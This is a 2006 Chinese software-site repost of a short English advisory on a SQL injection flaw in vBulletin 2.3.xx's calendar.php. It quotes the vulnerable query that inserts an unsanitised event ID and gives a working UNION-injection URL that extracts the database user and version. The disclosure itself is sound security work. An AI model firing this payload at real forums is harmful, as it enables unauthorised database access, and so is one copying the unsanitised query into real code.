文章分类 | 软件分类 | 最新软件 | 杀毒软件 | 实用软件  | MTV下载  | 设为首页 |
  | 下载分类 | 最近更新
您的位置: 首页 >> 文章首页 >> 技术开发 >> PHP 学院 >> PHP文摘 >>  
PHP文摘点击TOP10
·利用PHP动态生成VRML网页2006-2-9 14:42:54
·关于密码校验2006-2-9 14:57:14
·Zend Studio 5 Beta2006-2-10 12:48:42
·967 个函式2006-2-5 13:59:40
·PHP的FDF文档支持2006-2-9 14:37:22
·发表文章时自动保存图片2006-2-8 21:57:47
·PHP中上传大体积文件时需要的设置2006-2-9 16:27:50
·初探PHP52006-2-9 16:28:45
·PHP4之真OO2006-2-5 18:56:13
·OpenBSD可加载内核模块编程完全指南2006-2-9 12:48:51
PHP 学院点击TOP10
·利用PHP动态生成VRML网页2006-2-9 14:42:54
·PHP&MYSQL服务器配置说明2006-2-5 12:26:12
·分页显示Oracle数据库记录的类之一2006-2-5 23:51:32
·编写PHP的安全策略2006-2-9 16:37:13
·使用OOP技术来优化PHP应用程序2006-2-9 16:33:27
·967 个函式2006-2-5 13:59:40
·Zend Studio 5 Beta2006-2-10 12:48:42
·一个很方便的 XML 类!!原创的噢2006-2-6 6:54:26
·JAVA/JSP学习系列之七2006-2-6 7:40:36
·一个odbc连mssql分页的类2006-2-5 14:26:46

 
vBulletin Forum 2.3.xx SQL Injection
作者:我去下载           时间:2006-2-5 14:14:03


vBulletin Forum 2.3.xx SQL Injection
There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
分页:
相关文章:
Copyright© 2005-2006 wqxz.com, All Rights Reserved. 购买虚拟主机请与本站联系